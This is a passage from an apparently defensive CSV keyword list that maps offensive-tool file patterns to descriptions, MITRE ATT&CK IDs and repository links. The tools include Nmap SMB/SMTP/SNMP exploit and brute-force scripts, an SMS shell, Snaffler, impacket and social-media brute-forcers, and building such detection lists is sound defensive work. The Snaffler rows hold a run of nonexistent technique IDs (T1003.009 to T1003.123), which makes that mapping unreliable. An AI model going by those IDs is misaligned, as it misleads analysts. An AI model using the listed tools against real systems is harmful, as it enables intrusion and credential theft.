network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-vuln-conficker.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-vuln-cve2009-3103.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-vuln-cve-2017-7494.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-vuln-cve-2020-0796.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts,1,1,N/A,N/A,10,920,383,2022-01-22T18:40:30Z,2011-05-31T05:41:49Z -*/smb-vuln-ms06-025.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-vuln-ms07-029.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-vuln-ms08-067.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-vuln-ms10-054.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-vuln-ms10-061.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-vuln-ms17-010.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-vuln-regsvc-dos.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-vuln-webexec.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-webexec-exploit.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/SMShell.git*,offensive_tool_keyword,SMShell,PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers,T1021.001 - T1059.006 - T1071.004 - T1069.003,TA0002 - TA0011 - TA0009 - TA0040,N/A,N/A,C2,https://github.com/persistent-security/SMShell,1,1,N/A,10,10,272,20,2023-05-22T10:40:16Z,2023-05-22T08:26:44Z -*/SMShell/*,offensive_tool_keyword,SMShell,PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers,T1021.001 - T1059.006 - T1071.004 - T1069.003,TA0002 - TA0011 - TA0009 - TA0040,N/A,N/A,C2,https://github.com/persistent-security/SMShell,1,0,N/A,10,10,272,20,2023-05-22T10:40:16Z,2023-05-22T08:26:44Z -*/smtp-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smtp-commands.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smtp-enum-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smtp-ntlm-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smtp-open-relay.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smtp-strangeport.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smtp-user-enum*,offensive_tool_keyword,smtp-user-enum,Username guessing tool primarily for use against the default Solaris SMTP service. Can use either EXPN - VRFY or RCPT TO.,T1133 - T1110.001,TA0007 - TA0006,N/A,N/A,Credential Access,https://pentestmonkey.net/tools/user-enumeration/smtp-user-enum,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smtp-vuln-cve2010-4344.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smtp-vuln-cve2011-1720.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smtp-vuln-cve2011-1764.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smtp-vuln-cve2020-28017-through-28026-21nails.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/nccgroup/nmap-nse-vulnerability-scripts,1,1,N/A,N/A,7,620,64,2022-03-04T09:08:55Z,2021-05-18T15:20:30Z -*/smuggler.py*,offensive_tool_keyword,smuggler.py,HTML Smuggling Generator,T1564.001 - T1027 - T1566,TA0005,N/A,N/A,Phishing - Defense Evasion,https://github.com/infosecn1nja/red-team-scripts/blob/main/smuggler.py,1,1,N/A,9,3,228,42,2023-06-14T02:13:19Z,2023-01-15T22:37:34Z -*/SnaffCon.cs*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - 
T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*/SnaffCon/Snaffler*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 
- T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*/SnaffCore/*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - 
T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*/snafflertest/*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003,TA0003 - 
TA0004,N/A,N/A,Exploitation tools,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*/SnaffPoint.git*,offensive_tool_keyword,SnaffPoint,A tool for pointesters to find candies in SharePoint,T1210.001 - T1087.002 - T1059.006,TA0007 - TA0002 - TA0006,N/A,N/A,Discovery,https://github.com/nheiniger/SnaffPoint,1,1,N/A,7,2,191,19,2022-11-04T13:26:24Z,2022-08-25T13:16:06Z -*/sniff.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*/sniffer.git*,offensive_tool_keyword,sniffer,A modern alternative network traffic sniffer.,T1040 - T1052.001 - T1046 - T1552.002,TA0011 - TA0007 - TA0005,N/A,N/A,Sniffing & Spoofing,https://github.com/chenjiandongx/sniffer,1,1,N/A,N/A,7,668,58,2022-07-27T15:13:57Z,2021-11-08T15:36:03Z -*/sniffer-detect.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/snmp-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/snmp-hh3c-logins.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/snmp-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/snmp-interfaces.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/snmp-ios-config.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/snmp-netstat.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/snmp-processes.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/snmp-sysdescr.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/snmp-win32-services.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/snmp-win32-shares.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/snmp-win32-software.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/snmp-win32-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/snmpwn.git*,offensive_tool_keyword,snmpwn,SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. allowing us to cycle through large lists of users to find the ones that do.,T1210 - T1212 - T1558,TA0001 - TA0002,N/A,N/A,Exploitation tools,https://github.com/hatlord/snmpwn,1,1,N/A,N/A,3,222,50,2020-08-23T10:41:38Z,2016-06-16T10:31:13Z -*/snmpwn.rb*,offensive_tool_keyword,snmpwn,SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. 
allowing us to cycle through large lists of users to find the ones that do,T1210 - T1212 - T1558,TA0001 - TA0002,N/A,N/A,Exploitation tools,https://github.com/hatlord/snmpwn,1,1,N/A,N/A,3,222,50,2020-08-23T10:41:38Z,2016-06-16T10:31:13Z -*/SocialBox.sh*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://github.com/samsesh/SocialBox-Termux,1,1,N/A,7,10,2417,268,2023-07-14T10:59:10Z,2019-03-28T18:07:05Z -*/SocialBox-Termux*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://github.com/samsesh/SocialBox-Termux,1,1,N/A,10,10,2417,268,2023-07-14T10:59:10Z,2019-03-28T18:07:05Z -*/SocialPwned*,offensive_tool_keyword,SocialPwned,SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.,T1596,TA0002,N/A,N/A,OSINT exploitation tools,https://github.com/MrTuxx/SocialPwned,1,1,N/A,N/A,9,800,93,2023-08-12T21:59:23Z,2020-04-07T22:25:38Z -*/socks-auth-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - 